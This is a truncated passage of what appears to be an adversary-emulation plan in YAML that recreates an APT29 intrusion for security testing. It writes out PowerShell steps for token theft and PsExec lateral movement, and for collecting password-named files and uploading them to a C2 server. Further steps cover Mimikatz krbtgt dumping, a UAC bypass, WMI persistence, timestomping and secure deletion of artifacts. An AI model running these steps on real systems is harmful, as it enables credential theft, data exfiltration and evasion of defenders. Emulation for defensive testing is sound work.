- tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_execution - procedure_step: "8.A.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Ad-Search Computer Name *; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Ad-Search Computer Name *; - -- id: c4a59e39-53b0-4ace-9528-8ff052752ece - name: Identifying current user on other machines - description: Custom PowerShell script to perform AD triage for domain bound computers. 
- tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_execution - procedure_step: "8.A.2" - platforms: - windows: - psh: - command: | - Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; - - executors: - - name: powershell - command: | - Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; - -- id: 9fefcde6-083a-4440-8eca-dc03d30c0bcb - name: File and Directory Discovery (T1083) - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. 
- tactic: defensive-evasion - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "8.A.3" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -- id: bddc0abc-07a0-41b7-813f-e0c64d9226b3 - name: Copy Sandcat File - description: Copy Sandcat file using PsExec - tactic: lateral-movement - technique: - attack_id: T1105 - name: "Ingress Tool Transfer" - cti_source: 
"https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_lat_movement - procedure_step: "8.B" - platforms: - windows: - psh,pwsh: - command: | - move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; - set-location "C:\Program Files\SysinternalsSuite\"; - .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; - tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; - payloads: - - sandcat.go-windows-upx - - input_arguments: - pivot_machine_hostname: - description: Hostname of pivot machine - type: string - default: pivothost - - user.session.id: - description: Session id for user - type: string - default: "1" - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - -- id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a - name: Screen Capture (T1113) - description: Native API call(s) were used to collect a screenshot. - tactic: collection - technique: - attack_id: T1113 - name: "Screen Capture" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "8.D.1" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\Get-Screenshot.ps1 -Verbose -Force; - Get-Screenshot; - payloads: - - Get-Screenshot.ps1 - - executors: - - name: powershell - command: | - Import-Module .\Get-Screenshot.ps1 -Verbose -Force; - Get-Screenshot; - -# Step 9 - Collection - -- id: d5170a60-3bdc-44e0-9870-a38db5c0cf81 - name: File and Directory Discovery (T1083) - description: PowerShell's Get-ChildItem alias 'ls' is used to enumerate files in a remote file share. 
- tactic: discovery - technique: - attack_id: T1083 - name: "File and Directory Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "9.A.1" - platforms: - windows: - psh,pwsh: - command: | - ls #{remote.file.share} - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - executors: - - name: powershell - command: | - ls #{remote.file.share} - -- id: 08e57385-dbce-4850-8bb7-589ef79465ab - name: Automated document collection (T1119) - description: Execute PowerShell collection command to collect and compress files of specific extensions. - tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" - procedure_group: procedure_execution - procedure_step: "9.B.1" - platforms: - windows: - psh,pwsh: - command: | - move-item Rar.exe -Destination C:\Windows\Temp -Force; - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; - cd C:\Windows\Temp; - .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; - payloads: - - rar.exe - - executors: - - name: powershell - command: | - move-item Rar.exe -Destination C:\Windows\Temp -Force; - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include 
*.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; - cd C:\Windows\Temp; - .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; - -- id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 - name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) - description: Copy a target file from a remote file share through the existing C2 channel - tactic: exfiltration - technique: - attack_id: T1041 - name: "Exfiltration Over C2 Channel" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "9.B.8" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; - cleanup: | - remove-item upload.ps1 -Force - payloads: - - upload.ps1 - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; - cleanup_command: | - remove-item upload.ps1 -Force - -- id: 208b021b-c79a-4176-8ad1-3af99ed50c6f - name: Artifact Cleanup - Delete Staged Files - description: Cleanup files related to Operation - tactic: defensive-evasion - technique: - attack_id: T1070.004 - name: "Indicator Removal on Host: File 
Deletion" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_def_evasion - procedure_step: "9.C" - platforms: - windows: - psh,pwsh: - command: | - if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { - mkdir "C:\Program Files\SysInternalsSuite"; - } - set-location "C:\Program Files\SysInternalsSuite"; - - if (!$(test-path -path "sdelete64.exe")) { - iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; - Expand-Archive sdelete64.zip -force; - } - copy sdelete64.exe C:\Windows\Temp\; - cd C:\Windows\Temp\ ; - .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; - remove-item C:\Windows\Temp\sdelete64.exe -force; - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { - mkdir "C:\Program Files\SysInternalsSuite"; - } - set-location "C:\Program Files\SysInternalsSuite"; - - if (!$(test-path -path "sdelete64.exe")) { - iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; - Expand-Archive sdelete64.zip -force; - } - copy sdelete64.exe C:\Windows\Temp\; - cd C:\Windows\Temp\ ; - .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; - remove-item C:\Windows\Temp\sdelete64.exe -force; - -# Step 10 - Persistant Execution - -- id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe - name: Scheduled Task - 
description: Reboot the machine to aid in peristence callbacks - tactic: impact - technique: - attack_id: T1529 - name: "System Shutdown/Reboot" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_impact - procedure_step: "10.A.2" - platforms: - windows: - psh,pwsh: - command: | - write-host "[*] Restarting Computer"; - Restart-Computer -Force; - - executors: - - name: powershell - command: | - write-host "[*] Restarting Computer"; - Restart-Computer -Force; - -- id: 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 - name: Artifact Cleanup - description: Delete file artifacts left from the operation. - tactic: defensive-evasion - technique: - attack_id: T1070.004 - name: "Indicator Removal on Host: File Deletion" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_def_evasion - procedure_step: "10.A.3" - platforms: - windows: - psh,pwsh: - command: | - Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; - if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { - Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; - } else { - write-host "[!] File did not exist to be removed!"; - } - - if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Keystrokes"; - if ($?) { - write-host "[+] Job \"Keystrokes\" was remove."; - } - } else { - write-host "[!] 
Job \"Keystrokes\" did not exist."; - } - - if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Screenshot" -Force; - write-host "[+] Job \"screenshot\" was removed."; - } else { - write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; - } - remove-item upload.ps1 -Force; - - executors: - - name: powershell - command: | - Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; - if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { - Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; - } else { - write-host "[!] File did not exist to be removed!"; - } - - if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Keystrokes"; - if ($?) { - write-host "[+] Job \"Keystrokes\" was remove."; - } - } else { - write-host "[!] Job \"Keystrokes\" did not exist."; - } - - if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Screenshot" -Force; - write-host "[+] Job \"screenshot\" was removed."; - } else { - write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; - } - remove-item upload.ps1 -Force; - -- id: 00446217-53ca-4749-bacd-f41fe189d36e - name: Startup Folder Persistence Execution - description: Sets credentials for a headless RDP session to spawn triggering startup folder persistence. 
- tactic: lateral-movement - technique: - attack_id: T1037.005 - name: "Boot or Logon Initialization Scripts: Startup Items" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_lat_movement - procedure_step: "10.B" - platforms: - windows: - psh,pwsh: - command: | - cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; - mstsc /v:127.0.0.2; - sleep 10; - Get-Process -name mstsc; - if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - profile_user_password: - description: Password of profile user - type: string - default: Password123! - - executors: - - name: powershell - command: | - cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; - mstsc /v:127.0.0.2; - sleep 10; - Get-Process -name mstsc; - if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} - -# Scenario 2 - -# Step 11 - Initial Breach - -- id: e506f811-884d-4992-aacb-514b33a0324f - name: Click .LNK payload - description: Execute PowerShell collection command to collect and compress files of specific extensions. 
- tactic: execution - technique: - attack_id: T1204.002 - name: "User Execution: Malicious File" - cti_source: "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" - procedure_group: procedure_execution - procedure_step: "11.A" - platforms: - windows: - psh,pwsh: - command: | - Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; - - if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - Write-Host "Removed old kxwn.lock file"; - } - - powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; - cleanup: | - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - - input_arguments: - profile_user_day2: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; - - if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - Write-Host "Removed old kxwn.lock file"; - } - - powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; - cleanup_command: | - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - -# Step 12 - Fortify Access - -- id: 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 - name: Timestomp kxwn.lock - description: Timestomp kxwn.lock - tactic: defensive-evasion - technique: - attack_id: T1070.006 - name: "Indicator Removal on Host: Timestomp" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_def_evasion - procedure_step: "12.A" - platforms: - windows: - psh,pwsh: - command: | - if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { - write-host "[!] kxwn.lock was not found on this host."; - exit 1; - } else { - . 
.\timestomp.ps1; - timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; - } - payloads: - - timestomp.ps1 - - executors: - - name: powershell - command: | - if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { - write-host "[!] kxwn.lock was not found on this host."; - exit 1; - } else { - . .\timestomp.ps1; - timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; - } - -- id: f9c0b150-822f-497b-ad6d-187f24561e9a - name: Detect Anti-Virus - description: Detect anti-virus software on host - tactic: discovery - technique: - attack_id: T1518.001 - name: "Software Discovery: Security Software Discovery" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_discovery - procedure_step: "12.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepTwelve.ps1; - detectav - payloads: - - stepTwelve.ps1 - - executors: - - name: powershell - command: | - . .\stepTwelve.ps1; - detectav - -- id: 2b5a72b1-01e4-48ae-98b0-2570a7894371 - name: Detect Software - description: Detect software on host - tactic: discovery - technique: - attack_id: T1518 - name: "Software Discovery" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_discovery - procedure_step: "12.C" - platforms: - windows: - psh,pwsh: - command: | - . .\stepTwelve.ps1; - software; - payloads: - - stepTwelve.ps1 - - executors: - - name: powershell - command: | - . 
.\stepTwelve.ps1; - software; - -# Step 13 - Local Enumaration - -- id: 0cfadbcb-ec21-44ae-adb7-9a23176dd620 - name: Enumerate Computer Name - description: Triage host for ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysical,DnsFullyQualifie - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.A" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - comp; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - comp; - -- id: 96140694-6d13-40b6-9553-0e63533469f3 - name: Enumerate Domain Name - description: Domain triage - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - domain; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - domain; - -- id: f320eebd-e75b-4194-b529-79e64ad0b9ee - name: Enumerate Username - description: user triage - tactic: discovery - technique: - attack_id: T1033 - name: "System Owner/User Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.C" - platforms: - windows: - psh,pwsh: - command: | - . 
.\stepThirteen.ps1; - user; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - user; - -- id: a34ab8f2-a106-41fb-af0b-cf5382bd18ae - name: Enumerate Processes - description: Process triage - tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.D" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - pslist; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - pslist; - -# Step 14 - Elevation - -- id: 5226e5dc-fc28-43b7-a679-0db49d520402 - name: UAC Bypass via sdctl - description: Invoke UAC bypass sdctl - tactic: defensive-evasion - technique: - attack_id: T1134.002 - name: "Access Token Manipulation: Create Process with Token" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_def_evasion - procedure_step: "14.A" - platforms: - windows: - psh,pwsh: - command: | - . .\stepFourteen_bypassUAC.ps1; - bypass; - payloads: - - stepFourteen_bypassUAC.ps1 - - executors: - - name: powershell - command: | - . .\stepFourteen_bypassUAC.ps1; - bypass; - -- id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 - name: Credential Dumping - description: Dumping credentials via wmidump (Mimikatz) - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - procedure_group: procedure_cred_access - procedure_step: "14.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepFourteen_credDump.ps1; - payloads: - - stepFourteen_credDump.ps1 - - executors: - - name: powershell - command: | - . 
.\stepFourteen_credDump.ps1; - -- id: 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 - name: Stage Mimikatz Binary - description: Staging Mimikatz Binary for later execution - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - procedure_group: procedure_cred_access - procedure_step: "14.C" - platforms: - windows: - psh,pwsh: - command: | - write-host "[+] Successfully downloaded m.exe"; - payloads: - - m.exe - - executors: - - name: powershell - command: | - write-host "[+] Successfully downloaded m.exe"; - -# Step 15 - Establish Persistence - -- id: 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 - name: WMI Persistence technique - description: user triage - tactic: persistence - technique: - attack_id: T1546.003 - name: "Event Triggered Execution: Windows Management Instrumentation Event Subscription" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_persistence - procedure_step: "15.A" - platforms: - windows: - psh,pwsh: - command: | - Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; - if ($?) { - write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; - exit 1; - } else { - . .\stepFifteen_wmi.ps1; - wmi; - if ($?) { - write-host "[+] WMI script has successfully executed!"; - exit 0; - } - exit 1; - } - payloads: - - stepFifteen_wmi.ps1 - - executors: - - name: powershell - command: | - Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; - if ($?) { - write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; - exit 1; - } else { - . .\stepFifteen_wmi.ps1; - wmi; - if ($?) 
{ - write-host "[+] WMI script has successfully executed!"; - exit 0; - } - exit 1; - } - -# Step 16 - Lateral Movement - -- id: 1c8552c7-f7ed-4523-b640-72d65af5f855 - name: Enumerate Domain Controller - description: Get domain controller and current user SID for the domain - tactic: discovery - technique: - attack_id: T1018 - name: "Remote System Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "16.A" - platforms: - windows: - psh,pwsh: - command: | - . .\powerview.ps1; - get-netdomaincontroller; - payloads: - - powerview.ps1 - - executors: - - name: powershell - command: | - . .\powerview.ps1; - get-netdomaincontroller; - -- id: a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 - name: Enumerate Domain SID - description: Get domain user SID - tactic: discovery - technique: - attack_id: T1033 - name: "System Owner/User Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "16.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepSixteen_SID.ps1; - siduser; - payloads: - - stepSixteen_SID.ps1 - - executors: - - name: powershell - command: | - . .\stepSixteen_SID.ps1; - siduser; - -- id: acecc8f7-18c2-41fd-87bc-39ffd644e4e9 - name: Remote Connection (T1028) & Remote File Copy (T1105) & Credential Dumping - description: Establish connection to Domain Controller - tactic: lateral-movement - technique: - attack_id: T1105 - name: "Ingress Tool Transfer" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_lat_movement - procedure_step: "16.C" - platforms: - windows: - psh,pwsh: - command: | - . 
.\invoke-winrmsession.ps1; - $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; - Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; - if ($?) { - write-host "[+] Successfully copied m.exe to remote host"; - } else { - write-host "[!] Error, copying and executing m.exe on remote host"; - } - Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string - - payloads: - - invoke-winrmsession.ps1 - - m.exe - - input_arguments: - target.winrm.username: - description: Username of winrm target - type: string - default: Administrator - - target.winrm.password: - description: Password for winrm target user - type: string - default: Password123! - - target.winrm.remote_host: - description: IP or Hostname of remote host - type: string - default: 192.0.2.20 - - executors: - - name: powershell - command: | - . .\invoke-winrmsession.ps1; - $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; - Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; - if ($?) { - write-host "[+] Successfully copied m.exe to remote host"; - } else { - write-host "[!] Error, copying and executing m.exe on remote host"; - } - Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string - -# Step 17 - Collection - -- id: b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c - name: Collect E-mails - description: Perform e-mail collection from custom PowerShell module. 
- tactic: collection - technique: - attack_id: T1114.001 - name: "Email Collection: Local Email Collection" - cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" - procedure_group: procedure_collection - procedure_step: "17.A" - platforms: - windows: - psh,pwsh: - command: | - . .\stepSeventeen_email.ps1; - Write-Host "Emails Collected"; - payloads: - - stepSeventeen_email.ps1 - - executors: - - name: powershell - command: | - . .\stepSeventeen_email.ps1; - Write-Host "Emails Collected"; - -- id: fc231955-774f-442c-ac0e-e74dfda50c5c - name: Collect Files & Compress Collection - description: Collect a specific document from a target machine. - tactic: collection - technique: - attack_id: T1005 - name: "Data from Local System" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_collection - procedure_step: "17.B" - platforms: - windows: - psh,pwsh: - command: | - try{ - if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { - New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; - } - } catch { - write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; - exit 1; - } - - if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { - write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; - exit 1; - } - Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; - . .\stepSeventeen_zip.ps1; - zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; - if ($?) 
